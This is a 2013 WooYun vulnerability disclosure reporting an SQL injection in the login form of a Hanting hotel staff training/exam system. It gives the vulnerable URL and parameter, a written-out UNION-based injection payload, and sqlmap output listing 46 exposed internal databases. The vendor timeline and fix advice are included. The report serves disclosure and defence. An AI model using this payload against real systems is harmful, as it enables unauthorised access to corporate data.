当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020735

漏洞标题:汉庭某系统注射注射出几个系统

相关厂商:汉庭酒店

漏洞作者: 小胖子

提交时间:2013-03-27 02:45

修复时间:2013-05-11 02:45

公开时间:2013-05-11 02:45

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-27: 细节已通知厂商并且等待厂商处理中
2013-03-27: 厂商已经确认,细节仅向厂商公开
2013-04-06: 细节向核心白帽子及相关领域专家公开
2013-04-16: 细节向普通白帽子公开
2013-04-26: 细节向实习白帽子公开
2013-05-11: 细节向公众公开

简要描述:

听说汉庭有免房卡?

详细说明:

这下可牵扯出大的了。
千里之堤毁于注入,注入地点:
http://training.htinns.com/exam2/ 汉庭考试系统?员工还考试的?
很明显的是有些系统也被波及了,比如上一级目录就是OA系统!
http://training.htinns.com/
注入点,登录框注射,参数,username。
随手输入'or'登录,就报错,还不是小报错。

sql.jpg


然后呢
Payload: username=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(58)+CHAR(110)+CHAR(104)
+CHAR(120)+CHAR(58)+CHAR(119)+CHAR(75)+CHAR(100)+CHAR(90)+CHAR(89)+CHAR(66)+CHAR
(103)+CHAR(110)+CHAR(79)+CHAR(120)+CHAR(58)+CHAR(110)+CHAR(98)+CHAR(117)+CHAR(58
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &password=1&czbz=1
在然后呢?丢到sqlmap去看看。

SQLINJECT.jpg


跑出数据库一看,不看不知道,一看吓一跳。

available databases [46]:
[*] Application_Registry_Service_DB
[*] Bdc_Service_DB
[*] dbcenter
[*] Decision
[*] eCell6
[*] Exam1
[*] HTFranchisee
[*] HtinnsAdviser
[*] HTScore
[*] InnInspection
[*] InspectionAudit
[*] Managed Metadata Service
[*] master
[*] model
[*] msdb
[*] OA
[*] PerformancePoint Service Application
[*] PnCheck
[*] PurchaseSurvey
[*] RCTIDB
[*] ReportServer
[*] ReportServerTempDB
[*] ROOMCHK
[*] Search_Service_Application_CrawlStoreDB
[*] Search_Service_Application_DB
[*] Search_Service_Application_PropertyStoreDB
[*] Secure_Store_Service_DB
[*] SharePoint_AdminContent
[*] SharePoint_Config
[*] slam
[*] StateService
[*] tempdb
[*] test
[*] User Profile Service Application_ProfileDB
[*] User Profile Service Application_SocialDB
[*] User Profile Service Application_SyncDB
[*] USERPLUS
[*] VHArchives_HanTing
[*] WebAnalyticsService_ReportingDB
[*] WebAnalyticsService_StagingDB
[*] WordAutomationServices
[*] WSS_Content
[*] WSS_Content_90
[*] WSS_Content
[*] WSS_Logging
[*] YunYing


46个数据库,仔细一看,还有另外几个大系统的库。
比如:
OA系统:http://training.htinns.com/
网上报销系统:http://hters.htinns.com
运营系统:http://yunying.htinns.com/ 数据库YunYing,可惜只能盲注,好慢好慢。
投资决策系统:http://jcxt.htinns.com/
都是重要系统,本屌丝不敢乱来,赶紧报送,望速修复。

漏洞证明:

见详细说明。

修复方案:

1:注入没什么好说的,过滤过滤再过滤。
2:数据库账户降权。
3:礼物和rank是不是要给力一点?乌云自有颜如玉,也要汉庭大床房!

版权声明:转载请注明来源 小胖子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-03-27 13:25

厂商回复:

感谢漏洞提交,已转交相关小组进行跟进,该漏洞其他同学已提交过,不过还是给个15分。

最新状态:

暂无